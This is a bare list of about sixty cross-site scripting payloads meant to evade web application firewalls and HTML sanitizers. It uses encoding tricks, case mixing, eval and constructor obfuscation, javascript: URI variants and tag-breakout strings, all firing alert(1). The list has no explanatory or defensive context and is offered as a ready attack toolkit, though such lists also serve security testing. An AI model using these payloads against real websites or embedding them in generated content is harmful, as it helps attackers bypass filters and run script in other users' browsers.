# XSS Filter Bypass Payloads — WAF and sanitizer evasion
<svg/onload=alert(1)>
<svg	onload=alert(1)>
<svg
onload=alert(1)>
<svg onload=alert(1)>
<img src=x onerror=alert(1)//
<img src=x onerror=alert(1)/*>*/
<img src=x onerror="&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;">
<img src=x onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">
<img src=x onerror=\u0061\u006C\u0065\u0072\u0074(1)>
<img src=x onerror=al\u0065rt(1)>
<img src=x onerror=\141\154\145\162\164(1)>
<iMg sRc=x oNeRrOr=alert(1)>
<IMG SRC=x ONERROR=alert(1)>
<img src=x onerror=a]lert(1)> 
<img """><script>alert(1)</script>">
<img src=`xx:xx`onerror=alert(1)>
<img src=x:alert(alt) onerror=eval(src) alt=1>
<<script>alert(1)<</script>
<scri%00pt>alert(1)</scri%00pt>
<script>alert(1)//</script>
<script>al\u0065rt(1)</script>
<script>\u0061lert(1)</script>
<script>eval('al'+'ert(1)')</script>
<script>eval(atob('YWxlcnQoMSk='))</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
<script>window['eval']('alert(1)')</script>
<script>this['\x61lert'](1)</script>
<script>[]['\x66ilter']['\x63onstructor']('alert(1)')()</script>
<script>''['constructor']['constructor']('alert(1)')()</script>
<a href="&#106;avascript:alert(1)">X</a>
<a href="java&#115;cript:alert(1)">X</a>
<a href="&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;alert(1)">X</a>
<a href="jav&#x0D;ascript:alert(1)">X</a>
<a href="jav&#x0A;ascript:alert(1)">X</a>
<a href="jav&#x09;ascript:alert(1)">X</a>
%3Csvg%2Fonload%3Dalert%281%29%3E
%253Csvg%2520onload%253Dalert%25281%2529%253E
<svg onload=alert&lpar;1&rpar;>
<svg onload=alert&#40;1&#41;>
<svg onload=&#97;&#108;&#101;&#114;&#116;(1)>
<<x]>><img src=x onerror=alert(1)>
";alert(1)//
';alert(1)//
</script><script>alert(1)</script>
</style><script>alert(1)</script>
</title><script>alert(1)</script>
</textarea>'"><script>alert(1)</script>
</noscript><script>alert(1)</script>
<x onclick=alert(1)>click
<x contenteditable onblur=alert(1)>lose focus
<x style=animation-name:x onanimationstart=alert(1)>
<x style=animation-name:x onanimationend=alert(1)>
<x style=transition:all%201s onwebkittransitionend=alert(1) style=width:0>
<img src=x onerror=top.alert(1)>
<img src=x onerror=parent.alert(1)>
<img src=x onerror=self.alert(1)>
<img src=x onerror=frames.alert(1)>
<img src=x onerror=globalThis.alert(1)>
